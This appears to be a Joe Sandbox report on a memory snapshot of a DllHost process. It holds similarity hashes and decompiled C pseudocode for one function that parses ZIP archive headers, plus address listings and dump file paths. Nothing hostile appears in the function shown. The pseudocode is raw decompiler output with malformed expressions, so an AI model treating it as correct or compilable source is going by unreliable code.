                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 1.2.11
                                                                                                                                                              • API String ID: 0-4284987526
                                                                                                                                                              • Opcode ID: b26212a8be0f17e69c00bb18cea1352fcffa4df59e0610e17500e23011e1e19e
                                                                                                                                                              • Instruction ID: c221f140d0b2edd36eabfcc4596f67286ec28800385d41f6f02f49c79ccdfb72
                                                                                                                                                              • Opcode Fuzzy Hash: b26212a8be0f17e69c00bb18cea1352fcffa4df59e0610e17500e23011e1e19e
                                                                                                                                                              • Instruction Fuzzy Hash: 1C120132614A8287E758CF25E8403BEB7A0F789B58F94113ADF598B784DB3DE495C720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C7290 Relevance: .6, Instructions: 647COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 31%
                                                                                                                                                              			E00007FF77FF7191C7290(void* __edx, void* __ebp, long long __rcx, void* __rdx, long long __rsi, void* __r9, long long __r13, long long __r14, long long __r15) {
				void* __rbx;
				void* __rbp;
				void* _t228;
				void* _t261;
				void* _t265;
				void* _t286;
				void* _t297;
				intOrPtr _t301;
				void* _t304;
				void* _t311;
				void* _t314;
				void* _t372;
				long long _t436;
				signed long long _t439;
				signed long long _t440;
				void* _t443;
				signed long long _t444;
				void* _t446;
				long long _t449;
				signed long long _t453;
				long long _t454;
				signed long long _t516;
				signed long long _t584;
				long long _t591;
				long long _t592;
				long long _t593;
				void* _t595;
				intOrPtr* _t600;
				void* _t601;
				signed long long _t602;
				void* _t643;
				signed long long _t644;
				long long _t649;
				long long _t659;
				signed long long _t662;

				_t643 = __r9;
				_t593 = __rsi;
				_t600 = _t601 - 0x118;
				_t602 = _t601 - 0x218;
				_t439 =  *0x192190a0; // 0x590452ce5669
				_t440 = _t439 ^ _t602;
				 *(_t600 + 0xf0) = _t440;
				 *((long long*)(_t602 + 0x70)) = __rcx;
				 *(_t600 - 0x18) = _t453;
				_t591 = __rcx;
				 *(_t600 - 0x10) = _t453;
				 *(_t600 - 0x20) = _t453;
				 *(_t600 - 0x28) = _t453;
				if (__rdx != 0) goto 0x191c72e0;
				E00007FF77FF7191C9790(_t228, _t600 - 0x80);
				goto 0x191c7319;
				asm("movups xmm0, [edx]");
				asm("movups xmm1, [edx+0x10]");
				asm("movaps [ebp-0x80], xmm0");
				asm("movups xmm0, [edx+0x20]");
				asm("movaps [ebp-0x70], xmm1");
				asm("movups xmm1, [edx+0x30]");
				asm("movaps [ebp-0x60], xmm0");
				asm("movups xmm0, [edx+0x40]");
				asm("movaps [ebp-0x50], xmm1");
				asm("movups xmm1, [edx+0x50]");
				asm("movaps [ebp-0x40], xmm0");
				asm("movsd xmm0, [edx+0x60]");
				asm("movsd [ebp-0x20], xmm0");
				asm("movaps [ebp-0x30], xmm1");
				r8d = 5;
				E00007FF77FF7191C9670(); // executed
				 *(_t600 - 0x18) = _t440;
				_t644 = _t440;
				if (_t440 == 0) goto 0x191c7bfe;
				 *((long long*)(_t602 + 0x250)) = __rsi;
				 *((long long*)(_t602 + 0x210)) = __r13;
				 *((long long*)(_t602 + 0x208)) = __r14;
				 *((long long*)(_t602 + 0x200)) = __r15;
				 *(_t600 - 0x10) = _t644;
				 *((intOrPtr*)(_t600 + 0xd8)) = 0;
				 *(_t602 + 0x58) = _t440;
				0x191da670();
				_t662 = _t440;
				if (_t440 == 0) goto 0x191c7bd1;
				_t18 = _t593 - 2; // 0x2
				r9d = _t18;
				r8d = 0;
				E00007FF77FF7191C96B0(); // executed
				if (0xffff == 0) goto 0x191c73b1;
				E00007FF77FF7191D9C88(0x404, __edx, _t453, _t644);
				goto 0x191c7bd1;
				E00007FF77FF7191C96E0(); // executed
				 *(_t602 + 0x60) = _t440;
				if (_t440 - 0xffff >= 0) goto 0x191c73db;
				 *(_t602 + 0x58) = _t440;
				if (_t440 - __rsi <= 0) goto 0x191c7492;
				_t454 =  *(_t602 + 0x58);
				_t24 = _t593 + 0x400; // 0x404
				_t595 =  <=  ? _t24 : _t454;
				_t301 =  >  ? 0x404 : __edx - r14d;
				r9d = 0; // executed
				E00007FF77FF7191C96B0(); // executed
				if (0x404 != 0) goto 0x191c7490;
				r9d = _t301;
				if ( *((intOrPtr*)(_t600 - 0x70))() != _t301) goto 0x191c7490;
				_t28 = _t591 - 3; // -3
				_t297 = _t28;
				if (_t297 <= 0) goto 0x191c7482;
				_t443 = _t297 + 3 + _t662;
				_t444 = _t443 - 1;
				if ( *((char*)(_t444 - 3)) != 0x50) goto 0x191c746f;
				if ( *((char*)(_t443 - 3)) != 0x4b) goto 0x191c746f;
				if ( *((char*)(_t444 - 1)) != 5) goto 0x191c746f;
				if ( *_t444 == 6) goto 0x191c747a;
				_t372 = 0xfffffffd - _t662 + _t444;
				if (_t372 > 0) goto 0x191c7450;
				goto 0x191c7482;
				if (_t372 != 0) goto 0x191c7490;
				if (_t595 - _t454 < 0) goto 0x191c73e0;
				E00007FF77FF7191D9C88(0x404, _t297 - 1, _t454,  *(_t602 + 0x60));
				if (_t297 - 1 + _t440 - _t595 == 0) goto 0x191c7bd1;
				r9d = 0;
				E00007FF77FF7191C96B0(); // executed
				r12d = 0xffffffff;
				_t303 =  !=  ? r12d : 0; // executed
				E00007FF77FF7191C5EF0(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t602 + 0x58); // executed
				_t40 = _t644 + 2; // 0x2
				r9d = _t40;
				_t304 =  !=  ? r12d :  !=  ? r12d : 0;
				if ( *((intOrPtr*)(_t600 - 0x70))() != 1) goto 0x191c7501;
				r15d =  *(_t602 + 0x50) & 0x000000ff;
				goto 0x191c7512;
				if ( *((intOrPtr*)(_t600 - 0x48))() != 0) goto 0x191c7551;
				r15d = 0;
				r9d = 1;
				if ( *((intOrPtr*)(_t600 - 0x70))() != 1) goto 0x191c7539;
				goto 0x191c7556;
				if ( *((intOrPtr*)(_t600 - 0x48))() != 0) goto 0x191c7551;
				goto 0x191c7556;
				r9d = 1;
				 *((intOrPtr*)(_t600 + 0x30)) = 0;
				if ( *((intOrPtr*)(_t600 - 0x70))() != 1) goto 0x191c757f;
				r15d =  *(_t602 + 0x51) & 0x000000ff;
				goto 0x191c7590;
				if ( *((intOrPtr*)(_t600 - 0x48))() != 0) goto 0x191c75cf;
				r15d = 0;
				r9d = 1;
				if ( *((intOrPtr*)(_t600 - 0x70))() != 1) goto 0x191c75b7;
				goto 0x191c75d4;
				if ( *((intOrPtr*)(_t600 - 0x48))() != 0) goto 0x191c75cf;
				goto 0x191c75d4;
				r9d = 1;
				 *_t600 = 0;
				if ( *((intOrPtr*)(_t600 - 0x70))() != 1) goto 0x191c75fd;
				r15d =  *(_t602 + 0x51) & 0x000000ff;
				goto 0x191c760e;
				if ( *((intOrPtr*)(_t600 - 0x48))() != 0) goto 0x191c764d;
				r15d = 0;
				r9d = 1;
				if ( *((intOrPtr*)(_t600 - 0x70))() != 1) goto 0x191c7635;
				goto 0x191c7652;
				if ( *((intOrPtr*)(_t600 - 0x48))() != 0) goto 0x191c764d;
				goto 0x191c7652;
				r9d = 1;
				 *(_t600 - 8) = _t444;
				 *((intOrPtr*)(_t600 - 0x70))();
				if (0 != 1) goto 0x191c767e;
				r15d =  *(_t602 + 0x51) & 0x000000ff;
				goto 0x191c768f;
				 *((intOrPtr*)(_t600 - 0x48))();
				if (0 != 0) goto 0x191c76ce;
				r15d = 0;
				r9d = 1;
				 *((intOrPtr*)(_t600 - 0x70))();
				if (0 != 1) goto 0x191c76b6;
				goto 0x191c76d3;
				 *((intOrPtr*)(_t600 - 0x48))();
				if (0 != 0) goto 0x191c76ce;
				goto 0x191c76d3;
				_t95 = _t602 + 0x58; // 0x100000057
				 *(_t602 + 0x58) = 0;
				_t309 =  !=  ? 0xffffff99 : r12d;
				 *(_t602 + 0x60) = _t444;
				E00007FF77FF7191C5EF0(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t95);
				_t101 = _t602 + 0x58; // 0x100000057
				_t310 =  !=  ? r12d :  !=  ? 0xffffff99 : r12d;
				 *(_t600 + 0x38) = _t444;
				E00007FF77FF7191C5EF0(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t101);
				r9d = 1;
				 *(_t600 + 0x40) = _t444;
				_t311 =  !=  ? r12d :  !=  ? r12d :  !=  ? 0xffffff99 : r12d;
				if ( *((intOrPtr*)(_t600 - 0x70))() != 1) goto 0x191c7750;
				r15d =  *(_t602 + 0x51) & 0x000000ff;
				goto 0x191c7765;
				if ( *((intOrPtr*)(_t600 - 0x48))() != 0) goto 0x191c7bce;
				r15d = 0;
				r9d = 1;
				if ( *((intOrPtr*)(_t600 - 0x70))() != 1) goto 0x191c7786;
				goto 0x191c779a;
				_t261 =  *((intOrPtr*)(_t600 - 0x48))();
				if (_t261 != 0) goto 0x191c7bce;
				 *(_t600 + 4) = 0 << 0x00000008 | r15d;
				if (_t311 != 0) goto 0x191c7bd1;
				_t596 =  *(_t600 - 0x18);
				r9d = 0; // executed
				E00007FF77FF7191C96B0(); // executed
				if (_t261 != 0) goto 0x191c7a3f;
				_t124 = _t602 + 0x58; // 0x100000057
				if (E00007FF77FF7191C5EF0(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t124) != 0) goto 0x191c7a3f;
				if ( *(_t602 + 0x58) != 0x7064b50) goto 0x191c7a3f;
				if (E00007FF77FF7191C5EF0(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t602 + 0x58) != 0) goto 0x191c7a3f;
				_t129 = _t602 + 0x68; // 0x100000067
				if (E00007FF77FF7191C6010(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t129) != 0) goto 0x191c7a3f;
				_t265 = E00007FF77FF7191C5EF0(_t454, _t600 - 0x80, _t596, _t600, _t602 + 0x58);
				if (_t265 != 0) goto 0x191c7a3f;
				_t659 =  *((intOrPtr*)(_t602 + 0x68));
				r9d = 0;
				E00007FF77FF7191C96B0();
				if (_t265 != 0) goto 0x191c7a3f;
				if (E00007FF77FF7191C5EF0(_t454, _t600 - 0x80, _t596, _t600, _t602 + 0x58) != 0) goto 0x191c7a3f;
				if ( *(_t602 + 0x58) != 0x6064b50) goto 0x191c7a3f;
				if (_t659 == 0) goto 0x191c7a3f;
				r9d = 0;
				 *((intOrPtr*)(_t600 + 0xd8)) = 1;
				_t649 = _t659;
				E00007FF77FF7191C96B0();
				_t312 =  !=  ? r12d : _t311;
				E00007FF77FF7191C5EF0(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t602 + 0x58);
				_t145 = _t602 + 0x68; // 0x100000067
				_t313 =  !=  ? r12d :  !=  ? r12d : _t311;
				E00007FF77FF7191C6010(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t145);
				r9d = 1;
				_t314 =  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : _t311;
				if ( *((intOrPtr*)(_t600 - 0x70))() == 1) goto 0x191c790d;
				if ( *((intOrPtr*)(_t600 - 0x48))() != 0) goto 0x191c7935;
				r9d = 1;
				if ( *((intOrPtr*)(_t600 - 0x70))() == 1) goto 0x191c7938;
				if ( *((intOrPtr*)(_t600 - 0x48))() == 0) goto 0x191c7938;
				r9d = 1;
				if ( *((intOrPtr*)(_t600 - 0x70))() == 1) goto 0x191c7964;
				if ( *((intOrPtr*)(_t600 - 0x48))() != 0) goto 0x191c798c;
				r9d = 1;
				if ( *((intOrPtr*)(_t600 - 0x70))() == 1) goto 0x191c798f;
				if ( *((intOrPtr*)(_t600 - 0x48))() == 0) goto 0x191c798f;
				E00007FF77FF7191C5EF0(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t600 + 0x30);
				_t317 =  !=  ? r12d : r12d;
				E00007FF77FF7191C5EF0(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t600);
				_t318 =  !=  ? r12d :  !=  ? r12d : r12d;
				E00007FF77FF7191C6010(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t600 - 8);
				_t178 = _t602 + 0x60; // 0x10000005f
				_t319 =  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r12d;
				E00007FF77FF7191C6010(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t178);
				_t320 =  !=  ? r12d :  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r12d;
				_t321 =  !=  ? 0xffffff99 :  !=  ? r12d :  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r12d;
				E00007FF77FF7191C6010(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t600 + 0x38);
				_t322 =  !=  ? r12d :  !=  ? 0xffffff99 :  !=  ? r12d :  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r12d;
				if (E00007FF77FF7191C6010(_t454, _t600 - 0x80,  *(_t600 - 0x18), _t600, _t600 + 0x40) != 0) goto 0x191c7bd1;
				_t429 =  !=  ? r12d :  !=  ? 0xffffff99 :  !=  ? r12d :  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r12d;
				if (( !=  ? r12d :  !=  ? 0xffffff99 :  !=  ? r12d :  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r12d) != 0) goto 0x191c7bd1;
				goto 0x191c7a70;
				if ( *(_t600 - 8) == 0xffff) goto 0x191c7bd1;
				_t516 =  *(_t600 + 0x38);
				if (_t516 == 0xffff) goto 0x191c7bd1;
				_t584 =  *(_t600 + 0x40);
				if (_t584 ==  *(_t600 - 8)) goto 0x191c7bd1;
				_t446 = _t584 + _t516;
				if (_t649 - _t446 < 0) goto 0x191c7bd1;
				if ( *_t600 != 0) goto 0x191c7aae;
				r8d = 5; // executed
				E00007FF77FF7191C9670(); // executed
				_t519 =  !=  ? _t446 :  *(_t600 - 0x18);
				 *(_t600 - 0x18) =  !=  ? _t446 :  *(_t600 - 0x18);
				 *((long long*)(_t600 + 0x28)) = _t649;
				 *((long long*)(_t600 + 0xd0)) = _t454;
				_t449 = _t649 -  *(_t600 + 0x40) -  *(_t600 + 0x38);
				 *((long long*)(_t600 + 8)) = _t449;
				0x191da670();
				_t592 = _t449;
				_t436 = _t449;
				if (_t436 == 0) goto 0x191c7bc9;
				asm("movups xmm0, [edx]");
				asm("movups [ecx-0x80], xmm0");
				asm("movups xmm1, [edx-0x70]");
				asm("movups [ecx-0x70], xmm1");
				asm("movups xmm0, [edx-0x60]");
				asm("movups [ecx-0x60], xmm0");
				asm("movups xmm1, [edx-0x50]");
				asm("movups [ecx-0x50], xmm1");
				asm("movups xmm0, [edx-0x40]");
				asm("movups [ecx-0x40], xmm0");
				asm("movups xmm1, [edx-0x30]");
				asm("movups [ecx-0x30], xmm1");
				asm("movups xmm0, [edx-0x20]");
				asm("movups [ecx-0x20], xmm0");
				asm("movups xmm1, [edx-0x10]");
				asm("movups [ecx-0x10], xmm1");
				if (_t436 != 0) goto 0x191c7af0;
				asm("movups xmm0, [edx]");
				 *((intOrPtr*)(_t602 + 0x40)) = 0;
				_t207 = _t592 + 0x130; // 0x130
				 *((long long*)(_t602 + 0x38)) = _t454;
				r9d = 0;
				asm("movups [ecx], xmm0");
				 *((intOrPtr*)(_t602 + 0x30)) = 0;
				asm("movups xmm1, [edx+0x10]");
				 *((long long*)(_t602 + 0x28)) = _t454;
				 *((intOrPtr*)(_t602 + 0x20)) = 0;
				asm("movups [ecx+0x10], xmm1");
				asm("movups xmm0, [edx+0x20]");
				asm("movups [ecx+0x20], xmm0");
				asm("movups xmm1, [edx+0x30]");
				asm("movups [ecx+0x30], xmm1");
				asm("movups xmm0, [edx+0x40]");
				asm("movups [ecx+0x40], xmm0");
				asm("movups xmm1, [edx+0x50]");
				asm("movups [ecx+0x50], xmm1");
				asm("movups xmm0, [edx+0x60]");
				_t212 = _t592 + 0xc8; // 0xc8
				asm("movups [ecx+0x60], xmm0");
				 *((long long*)(_t592 + 0x98)) =  *((intOrPtr*)(_t592 + 0xc0));
				 *((long long*)(_t592 + 0x90)) = _t454;
				_t286 = E00007FF77FF7191C5750(_t592, _t212, _t207, _t643); // executed
				 *((long long*)(_t592 + 0xa0)) = _t454;
				goto 0x191c7bde;
				 *(_t600 + 4) = 0 | _t286 == 0x00000000;
				 *((intOrPtr*)(_t600 - 0x50))();
				return E00007FF77FF7191D23B0(0, 0x170,  *(_t600 + 0xf0) ^ _t602);
			}






































                                                                                                                                                              0x7ff7191c7290
                                                                                                                                                              0x7ff7191c7290
                                                                                                                                                              0x7ff7191c7296
                                                                                                                                                              0x7ff7191c729e
                                                                                                                                                              0x7ff7191c72a5
                                                                                                                                                              0x7ff7191c72ac
                                                                                                                                                              0x7ff7191c72af
                                                                                                                                                              0x7ff7191c72b8
                                                                                                                                                              0x7ff7191c72bd
                                                                                                                                                              0x7ff7191c72c1
                                                                                                                                                              0x7ff7191c72c4
                                                                                                                                                              0x7ff7191c72c8
                                                                                                                                                              0x7ff7191c72cc
                                                                                                                                                              0x7ff7191c72d3
                                                                                                                                                              0x7ff7191c72d9
                                                                                                                                                              0x7ff7191c72de
                                                                                                                                                              0x7ff7191c72e0
                                                                                                                                                              0x7ff7191c72e3
                                                                                                                                                              0x7ff7191c72e7
                                                                                                                                                              0x7ff7191c72eb
                                                                                                                                                              0x7ff7191c72ef
                                                                                                                                                              0x7ff7191c72f3
                                                                                                                                                              0x7ff7191c72f7
                                                                                                                                                              0x7ff7191c72fb
                                                                                                                                                              0x7ff7191c72ff
                                                                                                                                                              0x7ff7191c7303
                                                                                                                                                              0x7ff7191c7307
                                                                                                                                                              0x7ff7191c730b
                                                                                                                                                              0x7ff7191c7310
                                                                                                                                                              0x7ff7191c7315
                                                                                                                                                              0x7ff7191c7319
                                                                                                                                                              0x7ff7191c7326
                                                                                                                                                              0x7ff7191c732b
                                                                                                                                                              0x7ff7191c732f
                                                                                                                                                              0x7ff7191c7335
                                                                                                                                                              0x7ff7191c733b
                                                                                                                                                              0x7ff7191c7348
                                                                                                                                                              0x7ff7191c7355
                                                                                                                                                              0x7ff7191c7362
                                                                                                                                                              0x7ff7191c736d
                                                                                                                                                              0x7ff7191c7371
                                                                                                                                                              0x7ff7191c7377
                                                                                                                                                              0x7ff7191c737c
                                                                                                                                                              0x7ff7191c7381
                                                                                                                                                              0x7ff7191c7387
                                                                                                                                                              0x7ff7191c738d
                                                                                                                                                              0x7ff7191c738d
                                                                                                                                                              0x7ff7191c7391
                                                                                                                                                              0x7ff7191c739b
                                                                                                                                                              0x7ff7191c73a2
                                                                                                                                                              0x7ff7191c73a7
                                                                                                                                                              0x7ff7191c73ac
                                                                                                                                                              0x7ff7191c73b8
                                                                                                                                                              0x7ff7191c73bd
                                                                                                                                                              0x7ff7191c73cb
                                                                                                                                                              0x7ff7191c73cd
                                                                                                                                                              0x7ff7191c73d5
                                                                                                                                                              0x7ff7191c73db
                                                                                                                                                              0x7ff7191c73e0
                                                                                                                                                              0x7ff7191c73f7
                                                                                                                                                              0x7ff7191c740e
                                                                                                                                                              0x7ff7191c7411
                                                                                                                                                              0x7ff7191c7414
                                                                                                                                                              0x7ff7191c741b
                                                                                                                                                              0x7ff7191c7421
                                                                                                                                                              0x7ff7191c742f
                                                                                                                                                              0x7ff7191c7431
                                                                                                                                                              0x7ff7191c7431
                                                                                                                                                              0x7ff7191c7439
                                                                                                                                                              0x7ff7191c7446
                                                                                                                                                              0x7ff7191c7455
                                                                                                                                                              0x7ff7191c745c
                                                                                                                                                              0x7ff7191c7462
                                                                                                                                                              0x7ff7191c7468
                                                                                                                                                              0x7ff7191c746d
                                                                                                                                                              0x7ff7191c7473
                                                                                                                                                              0x7ff7191c7476
                                                                                                                                                              0x7ff7191c7478
                                                                                                                                                              0x7ff7191c7480
                                                                                                                                                              0x7ff7191c748a
                                                                                                                                                              0x7ff7191c7495
                                                                                                                                                              0x7ff7191c749d
                                                                                                                                                              0x7ff7191c74ab
                                                                                                                                                              0x7ff7191c74b1
                                                                                                                                                              0x7ff7191c74c7
                                                                                                                                                              0x7ff7191c74cd
                                                                                                                                                              0x7ff7191c74d1
                                                                                                                                                              0x7ff7191c74da
                                                                                                                                                              0x7ff7191c74da
                                                                                                                                                              0x7ff7191c74ed
                                                                                                                                                              0x7ff7191c74f7
                                                                                                                                                              0x7ff7191c74f9
                                                                                                                                                              0x7ff7191c74ff
                                                                                                                                                              0x7ff7191c750d
                                                                                                                                                              0x7ff7191c750f
                                                                                                                                                              0x7ff7191c751b
                                                                                                                                                              0x7ff7191c752a
                                                                                                                                                              0x7ff7191c7537
                                                                                                                                                              0x7ff7191c7547
                                                                                                                                                              0x7ff7191c754f
                                                                                                                                                              0x7ff7191c7566
                                                                                                                                                              0x7ff7191c756c
                                                                                                                                                              0x7ff7191c7575
                                                                                                                                                              0x7ff7191c7577
                                                                                                                                                              0x7ff7191c757d
                                                                                                                                                              0x7ff7191c758b
                                                                                                                                                              0x7ff7191c758d
                                                                                                                                                              0x7ff7191c7599
                                                                                                                                                              0x7ff7191c75a8
                                                                                                                                                              0x7ff7191c75b5
                                                                                                                                                              0x7ff7191c75c5
                                                                                                                                                              0x7ff7191c75cd
                                                                                                                                                              0x7ff7191c75e4
                                                                                                                                                              0x7ff7191c75ea
                                                                                                                                                              0x7ff7191c75f3
                                                                                                                                                              0x7ff7191c75f5
                                                                                                                                                              0x7ff7191c75fb
                                                                                                                                                              0x7ff7191c7609
                                                                                                                                                              0x7ff7191c760b
                                                                                                                                                              0x7ff7191c7617
                                                                                                                                                              0x7ff7191c7626
                                                                                                                                                              0x7ff7191c7633
                                                                                                                                                              0x7ff7191c7643
                                                                                                                                                              0x7ff7191c764b
                                                                                                                                                              0x7ff7191c7664
                                                                                                                                                              0x7ff7191c766a
                                                                                                                                                              0x7ff7191c766e
                                                                                                                                                              0x7ff7191c7674
                                                                                                                                                              0x7ff7191c7676
                                                                                                                                                              0x7ff7191c767c
                                                                                                                                                              0x7ff7191c7685
                                                                                                                                                              0x7ff7191c768a
                                                                                                                                                              0x7ff7191c768c
                                                                                                                                                              0x7ff7191c7698
                                                                                                                                                              0x7ff7191c76a1
                                                                                                                                                              0x7ff7191c76a7
                                                                                                                                                              0x7ff7191c76b4
                                                                                                                                                              0x7ff7191c76bf
                                                                                                                                                              0x7ff7191c76c4
                                                                                                                                                              0x7ff7191c76cc
                                                                                                                                                              0x7ff7191c76d7
                                                                                                                                                              0x7ff7191c76e7
                                                                                                                                                              0x7ff7191c76eb
                                                                                                                                                              0x7ff7191c76ee
                                                                                                                                                              0x7ff7191c76f7
                                                                                                                                                              0x7ff7191c7700
                                                                                                                                                              0x7ff7191c770f
                                                                                                                                                              0x7ff7191c7713
                                                                                                                                                              0x7ff7191c7717
                                                                                                                                                              0x7ff7191c772f
                                                                                                                                                              0x7ff7191c7738
                                                                                                                                                              0x7ff7191c773c
                                                                                                                                                              0x7ff7191c7746
                                                                                                                                                              0x7ff7191c7748
                                                                                                                                                              0x7ff7191c774e
                                                                                                                                                              0x7ff7191c775c
                                                                                                                                                              0x7ff7191c7762
                                                                                                                                                              0x7ff7191c776e
                                                                                                                                                              0x7ff7191c777d
                                                                                                                                                              0x7ff7191c7784
                                                                                                                                                              0x7ff7191c778f
                                                                                                                                                              0x7ff7191c7794
                                                                                                                                                              0x7ff7191c77a0
                                                                                                                                                              0x7ff7191c77a5
                                                                                                                                                              0x7ff7191c77ab
                                                                                                                                                              0x7ff7191c77ba
                                                                                                                                                              0x7ff7191c77bd
                                                                                                                                                              0x7ff7191c77c4
                                                                                                                                                              0x7ff7191c77ca
                                                                                                                                                              0x7ff7191c77dd
                                                                                                                                                              0x7ff7191c77eb
                                                                                                                                                              0x7ff7191c7804
                                                                                                                                                              0x7ff7191c780a
                                                                                                                                                              0x7ff7191c781d
                                                                                                                                                              0x7ff7191c782f
                                                                                                                                                              0x7ff7191c7836
                                                                                                                                                              0x7ff7191c783c
                                                                                                                                                              0x7ff7191c7848
                                                                                                                                                              0x7ff7191c784e
                                                                                                                                                              0x7ff7191c7855
                                                                                                                                                              0x7ff7191c786e
                                                                                                                                                              0x7ff7191c787c
                                                                                                                                                              0x7ff7191c7885
                                                                                                                                                              0x7ff7191c7893
                                                                                                                                                              0x7ff7191c7896
                                                                                                                                                              0x7ff7191c78a3
                                                                                                                                                              0x7ff7191c78a6
                                                                                                                                                              0x7ff7191c78ba
                                                                                                                                                              0x7ff7191c78be
                                                                                                                                                              0x7ff7191c78c7
                                                                                                                                                              0x7ff7191c78d2
                                                                                                                                                              0x7ff7191c78d6
                                                                                                                                                              0x7ff7191c78ea
                                                                                                                                                              0x7ff7191c78f3
                                                                                                                                                              0x7ff7191c78fd
                                                                                                                                                              0x7ff7191c790b
                                                                                                                                                              0x7ff7191c7916
                                                                                                                                                              0x7ff7191c7925
                                                                                                                                                              0x7ff7191c7933
                                                                                                                                                              0x7ff7191c7948
                                                                                                                                                              0x7ff7191c7954
                                                                                                                                                              0x7ff7191c7962
                                                                                                                                                              0x7ff7191c796d
                                                                                                                                                              0x7ff7191c797c
                                                                                                                                                              0x7ff7191c798a
                                                                                                                                                              0x7ff7191c799b
                                                                                                                                                              0x7ff7191c79ae
                                                                                                                                                              0x7ff7191c79b2
                                                                                                                                                              0x7ff7191c79c5
                                                                                                                                                              0x7ff7191c79c9
                                                                                                                                                              0x7ff7191c79d2
                                                                                                                                                              0x7ff7191c79dd
                                                                                                                                                              0x7ff7191c79e1
                                                                                                                                                              0x7ff7191c79f8
                                                                                                                                                              0x7ff7191c7a06
                                                                                                                                                              0x7ff7191c7a09
                                                                                                                                                              0x7ff7191c7a1c
                                                                                                                                                              0x7ff7191c7a27
                                                                                                                                                              0x7ff7191c7a2d
                                                                                                                                                              0x7ff7191c7a2f
                                                                                                                                                              0x7ff7191c7a3d
                                                                                                                                                              0x7ff7191c7a47
                                                                                                                                                              0x7ff7191c7a4d
                                                                                                                                                              0x7ff7191c7a58
                                                                                                                                                              0x7ff7191c7a5e
                                                                                                                                                              0x7ff7191c7a6a
                                                                                                                                                              0x7ff7191c7a70
                                                                                                                                                              0x7ff7191c7a77
                                                                                                                                                              0x7ff7191c7a81
                                                                                                                                                              0x7ff7191c7a8c
                                                                                                                                                              0x7ff7191c7a92
                                                                                                                                                              0x7ff7191c7aa2
                                                                                                                                                              0x7ff7191c7aa6
                                                                                                                                                              0x7ff7191c7ab1
                                                                                                                                                              0x7ff7191c7ab8
                                                                                                                                                              0x7ff7191c7abf
                                                                                                                                                              0x7ff7191c7ac7
                                                                                                                                                              0x7ff7191c7acb
                                                                                                                                                              0x7ff7191c7ad0
                                                                                                                                                              0x7ff7191c7ad3
                                                                                                                                                              0x7ff7191c7ad6
                                                                                                                                                              0x7ff7191c7af7
                                                                                                                                                              0x7ff7191c7b01
                                                                                                                                                              0x7ff7191c7b05
                                                                                                                                                              0x7ff7191c7b09
                                                                                                                                                              0x7ff7191c7b0d
                                                                                                                                                              0x7ff7191c7b11
                                                                                                                                                              0x7ff7191c7b15
                                                                                                                                                              0x7ff7191c7b19
                                                                                                                                                              0x7ff7191c7b1d
                                                                                                                                                              0x7ff7191c7b21
                                                                                                                                                              0x7ff7191c7b25
                                                                                                                                                              0x7ff7191c7b29
                                                                                                                                                              0x7ff7191c7b2d
                                                                                                                                                              0x7ff7191c7b31
                                                                                                                                                              0x7ff7191c7b35
                                                                                                                                                              0x7ff7191c7b39
                                                                                                                                                              0x7ff7191c7b41
                                                                                                                                                              0x7ff7191c7b43
                                                                                                                                                              0x7ff7191c7b46
                                                                                                                                                              0x7ff7191c7b4a
                                                                                                                                                              0x7ff7191c7b51
                                                                                                                                                              0x7ff7191c7b56
                                                                                                                                                              0x7ff7191c7b59
                                                                                                                                                              0x7ff7191c7b5c
                                                                                                                                                              0x7ff7191c7b60
                                                                                                                                                              0x7ff7191c7b64
                                                                                                                                                              0x7ff7191c7b69
                                                                                                                                                              0x7ff7191c7b6d
                                                                                                                                                              0x7ff7191c7b71
                                                                                                                                                              0x7ff7191c7b75
                                                                                                                                                              0x7ff7191c7b79
                                                                                                                                                              0x7ff7191c7b7d
                                                                                                                                                              0x7ff7191c7b81
                                                                                                                                                              0x7ff7191c7b85
                                                                                                                                                              0x7ff7191c7b89
                                                                                                                                                              0x7ff7191c7b8d
                                                                                                                                                              0x7ff7191c7b91
                                                                                                                                                              0x7ff7191c7b95
                                                                                                                                                              0x7ff7191c7b9c
                                                                                                                                                              0x7ff7191c7baa
                                                                                                                                                              0x7ff7191c7bb1
                                                                                                                                                              0x7ff7191c7bb8
                                                                                                                                                              0x7ff7191c7bc2
                                                                                                                                                              0x7ff7191c7bcc
                                                                                                                                                              0x7ff7191c7bce
                                                                                                                                                              0x7ff7191c7bd9
                                                                                                                                                              0x7ff7191c7c19

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
